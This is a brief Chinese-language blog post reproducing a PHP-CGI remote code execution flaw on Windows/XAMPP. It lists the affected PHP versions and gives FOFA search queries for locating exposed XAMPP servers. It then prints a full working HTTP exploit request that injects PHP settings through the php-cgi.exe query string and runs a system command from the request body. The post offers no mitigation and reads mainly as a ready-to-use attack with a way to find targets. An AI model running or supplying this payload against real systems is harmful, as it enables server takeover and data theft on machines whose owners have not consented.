Babing
Published on 2024-08-30 / 1 Visits
0
0

P13-1PHP-CGI-Windows平台-RCE

P13-1PHP-CGI-Windows平台-RCE

漏洞描述:

该漏洞可在受影响的环境下执行任意PHP代码,从而获取操作系统权限。最严重的情况下,这可能导致服务器的完全接管,敏感数据泄露,甚至将服务器转化为发起其他攻击的跳板。

影响版本:

PHP 8.3 < 8.3.8

PHP 8.2 < 8.2.20

PHP 8.1 < 8.1.29

网站图片:

网站图片

fofa语法:

header=“Xampps_info” || body=“/xampps.jpg” || (header=“location http” && header=“xampp”) || body=“content="Kai Oswald Seidler” || title=“XAMPP for” || title=“XAMPP Version” || body=“font-size: 1.2em; color: red;">New XAMPP”

漏洞复现:

该poc仅适用于XAMPP默认配置
payload:

GET /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
REDIRECT-STATUS:1

<?php system("dir");?>

效果图:
效果图


Comment